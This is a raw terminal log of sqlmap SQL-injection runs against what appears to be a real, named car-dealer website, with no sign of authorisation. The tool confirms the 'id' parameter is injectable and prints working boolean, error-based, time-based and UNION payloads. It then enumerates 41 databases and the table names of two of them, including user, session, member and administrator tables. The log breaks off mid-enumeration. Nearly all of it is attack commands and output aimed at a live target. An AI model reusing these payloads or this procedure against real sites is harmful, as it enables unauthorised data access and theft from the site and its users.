it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[22:41:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:41:12] [WARNING] reflective value(s) found and filtering out
[22:41:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:41:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:42:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:42:58] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:44:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:46:26] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:46:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:10] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:50:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:43] [INFO] GET parameter 'id' seems to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[22:50:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:50:44] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[22:50:44] [INFO] testing 'MySQL inline queries'
[22:50:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:50:45] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:50:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:50:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:50:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:02] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:51:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:51:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:51:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:51:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:51:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:51:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:51:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:51:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:28] [CRITICAL] unable to connect to the target URL or proxy
[22:52:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:11] [CRITICAL] unable to connect to the target URL or proxy
[22:53:11] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[22:53:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:53:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:53:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:53:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:42] [INFO] target URL appears to have 4 columns in query
[22:54:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:54:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:54:21] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:54:21
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:54:29
[22:54:29] [INFO] resuming back-end DBMS 'mysql'
[22:54:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:54:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:54:31] [INFO] fetching database names
[22:54:32] [INFO] the SQL query used returns 41 entries
[22:54:33] [INFO] retrieved: information_schema
[22:54:34] [INFO] retrieved: club_15
[22:54:35] [INFO] retrieved: ebuy
[22:54:36] [INFO] retrieved: ebuy1217
[22:54:42] [INFO] retrieved: events
[22:54:47] [INFO] retrieved: events_2014cgr
[22:54:48] [INFO] retrieved: events_2014five
[22:54:49] [INFO] retrieved: events_pickupStory
[22:54:50] [INFO] retrieved: ezznissan
[22:54:51] [INFO] retrieved: innodb
[22:54:52] [INFO] retrieved: jinzhiwen
[22:54:53] [INFO] retrieved: maintain
[22:54:53] [INFO] retrieved: mysql
[22:54:54] [INFO] retrieved: nissan
[22:55:00] [INFO] retrieved: nissan_2015cgr
[22:55:01] [INFO] retrieved: nissan_jxs
[22:55:07] [INFO] retrieved: nissan_patrol
[22:55:08] [INFO] retrieved: nissanmedia
[22:55:08] [INFO] retrieved: nissantest
[22:55:09] [INFO] retrieved: paladin
[22:55:10] [INFO] retrieved: paladinclub
[22:55:10] [INFO] retrieved: paladinclubtemp
[22:55:11] [INFO] retrieved: palaqi
[22:55:12] [INFO] retrieved: performance_schema
[22:55:13] [INFO] retrieved: specialcar
[22:55:14] [INFO] retrieved: test
[22:55:19] [INFO] retrieved: topic
[22:55:20] [INFO] retrieved: tower_15
[22:55:21] [INFO] retrieved: wqw_five
[22:55:22] [INFO] retrieved: wqw_mx6gc
[22:55:28] [INFO] retrieved: wqw_succk
[22:55:29] [INFO] retrieved: xuhui
[22:55:30] [INFO] retrieved: yaguan
[22:55:30] [INFO] retrieved: zznissan
[22:55:32] [INFO] retrieved: zznissan_eng
[22:55:33] [INFO] retrieved: zznissan_jnds
[22:55:33] [INFO] retrieved: zznissan_lms2015
[22:55:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:55:45] [INFO] retrieved: zznissan_mx6sj2015
[22:55:46] [INFO] retrieved: zznissan_mx6tg2015
[22:55:46] [INFO] retrieved: zznissan_pro
[22:55:47] [INFO] retrieved: zznissanbak
available databases [41]:
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:55:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:55:47
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:07
[22:56:07] [INFO] resuming back-end DBMS 'mysql'
[22:56:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:56:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:56:09] [INFO] fetching current database
current database: 'zznissan'
[22:56:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:56:10
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --tables -D zznissan
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:32
[22:56:33] [INFO] resuming back-end DBMS 'mysql'
[22:56:33] [INFO] testing connection to the target URL
[22:56:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:56:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:56:50] [INFO] fetching tables for database: 'zznissan'
[22:56:51] [INFO] the SQL query used returns 78 entries
[22:56:52] [INFO] retrieved: Recruitment
[22:56:53] [INFO] retrieved: act_article
[22:56:54] [INFO] retrieved: act_category
[22:56:55] [INFO] retrieved: article
[22:56:56] [INFO] retrieved: article1029
[22:56:57] [INFO] retrieved: brandpicture
[22:56:58] [INFO] retrieved: car_adimg
[22:56:58] [INFO] retrieved: car_brand
[22:57:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:57:15] [INFO] retrieved: car_carimg
[22:57:16] [INFO] retrieved: car_config
[22:57:16] [INFO] retrieved: car_detail
[22:57:17] [INFO] retrieved: car_drive
[22:57:19] [INFO] retrieved: car_drivehouse
[22:57:19] [INFO] retrieved: car_getinfo
[22:57:25] [INFO] retrieved: car_leixing
[22:57:26] [INFO] retrieved: car_models
[22:57:27] [INFO] retrieved: car_modelsinfo
[22:57:28] [INFO] retrieved: car_norms
[22:57:28] [INFO] retrieved: car_parameter
[22:57:34] [INFO] retrieved: car_seat
[22:57:35] [INFO] retrieved: car_series
[22:57:36] [INFO] retrieved: car_seriesinfo
[22:57:37] [INFO] retrieved: car_spec
[22:57:38] [INFO] retrieved: car_speed
[22:57:38] [INFO] retrieved: car_standard
[22:57:39] [INFO] retrieved: car_structure
[22:57:50] [INFO] retrieved: car_user
[22:57:50] [INFO] retrieved: car_userfun
[22:57:51] [INFO] retrieved: car_usergroup
[22:57:57] [INFO] retrieved: car_view
[22:57:58] [INFO] retrieved: category
[22:58:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:14] [INFO] retrieved: department
[22:58:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:26] [INFO] retrieved: displacement
[22:58:27] [INFO] retrieved: downcategory
[22:58:27] [INFO] retrieved: download
[22:58:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:55] [INFO] retrieved: dqcategory
[22:58:55] [INFO] retrieved: ecatalog
[22:59:01] [INFO] retrieved: energy_config
[22:59:02] [INFO] retrieved: energy_detail
[22:59:03] [INFO] retrieved: energy_images
[22:59:04] [INFO] retrieved: energy_memory
[22:59:05] [INFO] retrieved: energy_notice
[22:59:11] [INFO] retrieved: energy_parameter
[22:59:12] [INFO] retrieved: energy_picture
[22:59:23] [INFO] retrieved: energy_series
[22:59:29] [INFO] retrieved: energy_seriesinfo
[22:59:29] [INFO] retrieved: energy_video
[22:59:35] [INFO] retrieved: energy_view
[22:59:37] [INFO] retrieved: feedback
[22:59:37] [INFO] retrieved: get_active
[22:59:39] [INFO] retrieved: imagefile
[22:59:41] [INFO] retrieved: imgcategory
[22:59:42] [INFO] retrieved: jxs_getinfo
[22:59:42] [INFO] retrieved: login_record
[22:59:43] [INFO] retrieved: memory
[22:59:49] [INFO] retrieved: mobilepicture
[22:59:50] [INFO] retrieved: mx6_dealer
[22:59:56] [INFO] retrieved: mx6_testdrive
[23:00:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:13] [INFO] retrieved: mx6_user
[23:00:13] [INFO] retrieved: picture
[23:00:14] [INFO] retrieved: price
[23:00:15] [INFO] retrieved: purecategory
[23:00:22] [INFO] retrieved: puregoods
[23:00:22] [INFO] retrieved: rencai
[23:00:23] [INFO] retrieved: service
[23:00:24] [INFO] retrieved: service_bak
[23:00:31] [INFO] retrieved: sessions
[23:00:32] [INFO] retrieved: survey
[23:00:38] [INFO] retrieved: telents
[23:00:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:49] [INFO] retrieved: topic
[23:00:50] [INFO] retrieved: user
[23:00:56] [INFO] retrieved: userfun
[23:00:57] [INFO] retrieved: usergroup
[23:00:58] [INFO] retrieved: view_Carprice
[23:00:59] [INFO] retrieved: view_models
[23:01:05] [INFO] retrieved: view_models_test
[23:01:06] [INFO] retrieved: view_parameter
[23:01:07] [INFO] retrieved: zhaopin
Database: zznissan
[78 tables]
+-------------------+
| Recruitment |
| user |
| act_article |
| act_category |
| article |
| article1029 |
| brandpicture |
| car_adimg |
| car_brand |
| car_carimg |
| car_config |
| car_detail |
| car_drive |
| car_drivehouse |
| car_getinfo |
| car_leixing |
| car_models |
| car_modelsinfo |
| car_norms |
| car_parameter |
| car_seat |
| car_series |
| car_seriesinfo |
| car_spec |
| car_speed |
| car_standard |
| car_structure |
| car_user |
| car_userfun |
| car_usergroup |
| car_view |
| category |
| department |
| displacement |
| downcategory |
| download |
| dqcategory |
| ecatalog |
| energy_config |
| energy_detail |
| energy_images |
| energy_memory |
| energy_notice |
| energy_parameter |
| energy_picture |
| energy_series |
| energy_seriesinfo |
| energy_video |
| energy_view |
| feedback |
| get_active |
| imagefile |
| imgcategory |
| jxs_getinfo |
| login_record |
| memory |
| mobilepicture |
| mx6_dealer |
| mx6_testdrive |
| mx6_user |
| picture |
| price |
| purecategory |
| puregoods |
| rencai |
| service |
| service_bak |
| sessions |
| survey |
| telents |
| topic |
| userfun |
| usergroup |
| view_Carprice |
| view_models |
| view_models_test |
| view_parameter |
| zhaopin |
+-------------------+
[23:01:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:01:07
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --tables -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:09:41
[23:09:42] [INFO] resuming back-end DBMS 'mysql'
[23:09:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:09:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:09:42] [INFO] fetching tables for database: 'paladinclub'
[23:09:43] [INFO] the SQL query used returns 359 entries
[23:09:43] [INFO] retrieved: a_customers
[23:09:44] [INFO] retrieved: a_floor
[23:09:44] [INFO] retrieved: a_user
[23:09:45] [INFO] retrieved: article
[23:09:45] [INFO] retrieved: carinfo
[23:09:45] [INFO] retrieved: category
[23:09:46] [INFO] retrieved: cj_jl
[23:09:46] [INFO] retrieved: clubblock
[23:09:47] [INFO] retrieved: clubinfo
[23:09:47] [INFO] retrieved: czhd_memberinfo
[23:09:48] [INFO] retrieved: dakar
[23:09:48] [INFO] retrieved: dakar2006
[23:09:48] [INFO] retrieved: dakar20061
[23:09:49] [INFO] retrieved: dakar20062
[23:09:49] [INFO] retrieved: dakar20063
[23:09:50] [INFO] retrieved: dakar_config
[23:09:50] [INFO] retrieved: east2008_answer
[23:09:50] [INFO] retrieved: east2008_loginrecord
[23:09:51] [INFO] retrieved: east2008_question
[23:09:51] [INFO] retrieved: east2008_user
[23:09:52] [INFO] retrieved: east2008pho_loginrecord
[23:09:52] [INFO] retrieved: east2008pho_photo
[23:09:53] [INFO] retrieved: east2008pho_toupiao
[23:09:53] [INFO] retrieved: east2008pho_user
[23:09:54] [INFO] retrieved: eastgames_notify
[23:09:54] [INFO] retrieved: fankui
[23:09:54] [INFO] retrieved: file_flow
[23:09:55] [INFO] retrieved: file_flow_060817_bak
[23:09:55] [INFO] retrieved: file_info
[23:09:56] [INFO] retrieved: file_info_060817_bak
[23:09:56] [INFO] retrieved: file_save
[23:09:56] [INFO] retrieved: file_share
[23:09:57] [INFO] retrieved: file_share_060817_bak
[23:10:02] [INFO] retrieved: hk_article
[23:10:03] [INFO] retrieved: hk_class
[23:10:03] [INFO] retrieved: huikan
[23:10:03] [INFO] retrieved: imagefile
[23:10:04] [INFO] retrieved: imgcategory
[23:10:04] [INFO] retrieved: khly_hz
[23:10:05] [INFO] retrieved: language
[23:10:05] [INFO] retrieved: linesname
[23:10:06] [INFO] retrieved: lmsj
[23:10:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:10:17] [INFO] retrieved: media
[23:10:17] [INFO] retrieved: memberawoke
[23:10:18] [INFO] retrieved: memberinfo
[23:10:18] [INFO] retrieved: memberinfo1
[23:10:18] [INFO] retrieved: memberinfo_bak
[23:10:19] [INFO] retrieved: memberinfo_t
[23:10:19] [INFO] retrieved: membermark
[23:10:19] [INFO] retrieved: membermodify
[23:10:20] [INFO] retrieved: memberpay
[23:10:20] [INFO] retrieved: oneq_mission
[23:10:20] [INFO] retrieved: oneq_missiondata
[23:10:21] [INFO] retrieved: online
[23:10:26] [INFO] retrieved: paladin_awards
[23:10:27] [INFO] retrieved: prov
[23:10:27] [INFO] retrieved: pw_actattachs
[23:10:27] [INFO] retrieved: pw_actions
[23:10:28] [INFO] retrieved: pw_active
[23:10:28] [INFO] retrieved: pw_activity
[23:10:34] [INFO] retrieved: pw_activitycate
[23:10:34] [INFO] retrieved: pw_activitydefaultvalue
[23:10:34] [INFO] retrieved: pw_activityfield
[23:10:35] [INFO] retrieved: pw_activitymembers
[23:10:36] [INFO] retrieved: pw_activitymodel
[23:10:37] [INFO] retrieved: pw_activitypaylog
[23:10:37] [INFO] retrieved: pw_activityvalue1
[23:10:37] [INFO] retrieved: pw_activityvalue10
[23:10:43] [INFO] retrieved: pw_activityvalue11
[23:10:43] [INFO] retrieved: pw_activityvalue12
[23:10:44] [INFO] retrieved: pw_activityvalue13
[23:10:49] [INFO] retrieved: pw_activityvalue14
[23:10:50] [INFO] retrieved: pw_activityvalue15
[23:10:55] [INFO] retrieved: pw_activityvalue16
[23:10:56] [INFO] retrieved: pw_activityvalue17
[23:10:56] [INFO] retrieved: pw_activityvalue18
[23:10:57] [INFO] retrieved: pw_activityvalue2
[23:10:57] [INFO] retrieved: pw_activityvalue3
[23:10:57] [INFO] retrieved: pw_activityvalue4
[23:10:58] [INFO] retrieved: pw_activityvalue5
[23:10:58] [INFO] retrieved: pw_activityvalue6
[23:10:58] [INFO] retrieved: pw_activityvalue7
[23:11:04] [INFO] retrieved: pw_activityvalue8
[23:11:04] [INFO] retrieved: pw_activityvalue9
[23:11:05] [INFO] retrieved: pw_actmember
[23:11:05] [INFO] retrieved: pw_actmembers
[23:11:05] [INFO] retrieved: pw_administrators
[23:11:11] [INFO] retrieved: pw_adminlog
[23:11:11] [INFO] retrieved: pw_adminset
[23:11:12] [INFO] retrieved: pw_advert
[23:11:17] [INFO] retrieved: pw_announce
[23:11:19] [INFO] retrieved: pw_area_level
[23:11:24] [INFO] retrieved: pw_areas
[23:11:24] [INFO] retrieved: pw_argument
[23:11:25] [INFO] retrieved: pw_attachbuy
[23:11:25] [INFO] retrieved: pw_attachdownload
[23:11:26] [INFO] retrieved: pw_attachs
[23:11:26] [INFO] retrieved: pw_attention
[23:11:26] [INFO] retrieved: pw_attention_blacklist
[23:11:27] [INFO] retrieved: pw_auth_certificate
[23:11:32] [INFO] retrieved: pw_ban
[23:11:33] [INFO] retrieved: pw_banuser
[23:11:33] [INFO] retrieved: pw_bbsinfo
[23:11:34] [INFO] retrieved: pw_block
[23:11:34] [INFO] retrieved: pw_buyadvert
[23:11:34] [INFO] retrieved: pw_cache
[23:11:35] [INFO] retrieved: pw_cache_distribute
[23:11:35] [INFO] retrieved: pw_cache_members
[23:11:36] [INFO] retrieved: pw_cachedata
[23:11:36] [INFO] retrieved: pw_channel
[23:11:42] [INFO] retrieved: pw_clientorder
[23:11:42] [INFO] retrieved: pw_cmembers
[23:11:43] [INFO] retrieved: pw_cms_article
[23:11:43] [INFO] retrieved: pw_cms_articlecontent
[23:11:43] [INFO] retrieved: pw_cms_articleextend
[23:11:44] [INFO] retrieved: pw_cms_attach
[23:11:44] [INFO] retrieved: pw_cms_column
[23:11:45] [INFO] retrieved: pw_cms_comment
[23:11:45] [INFO] retrieved: pw_cms_commentreply
[23:11:51] [INFO] retrieved: pw_cms_purview
[23:11:56] [INFO] retrieved: pw_cnalbum
[23:11:57] [INFO] retrieved: pw_cnclass
[23:11:57] [INFO] retrieved: pw_cnlevel
[23:11:58] [INFO] retrieved: pw_cnphoto
[23:11:58] [INFO] retrieved: pw_cnskin
[23:11:58] [INFO] retrieved: pw_cnstyles
[23:11:59] [INFO] retrieved: pw_collection
[23:11:59] [INFO] retrieved: pw_collectiontype
[23:12:00] [INFO] retrieved: pw_colonys
[23:12:00] [INFO] retrieved: pw_comment
[23:12:00] [INFO] retrieved: pw_company
[23:12:01] [INFO] retrieved: pw_config
[23:12:01] [INFO] retrieved: pw_creditlog
[23:12:02] [INFO] retrieved: pw_credits
[23:12:02] [INFO] retrieved: pw_customfield
[23:12:02] [INFO] retrieved: pw_cwritedata
[23:12:08] [INFO] retrieved: pw_datanalyse
[23:12:08] [INFO] retrieved: pw_datastate
[23:12:14] [INFO] retrieved: pw_datastore
[23:12:14] [INFO] retrieved: pw_debateclass
[23:12:15] [INFO] retrieved: pw_debatedata
[23:12:15] [INFO] retrieved: pw_debateinfo
[23:12:16] [INFO] retrieved: pw_debatereplys
[23:12:16] [INFO] retrieved: pw_debates
[23:12:16] [INFO] retrieved: pw_debatethreads
[23:12:22] [INFO] retrieved: pw_delta_diarys
[23:12:22] [INFO] retrieved: pw_delta_members
[23:12:23] [INFO] retrieved: pw_delta_posts
[23:12:23] [INFO] retrieved: pw_delta_threads
[23:12:23] [INFO] retrieved: pw_diary
[23:12:29] [INFO] retrieved: pw_diarytype
[23:12:29] [INFO] retrieved: pw_draft
[23:12:29] [INFO] retrieved: pw_elements
[23:12:30] [INFO] retrieved: pw_extragroups
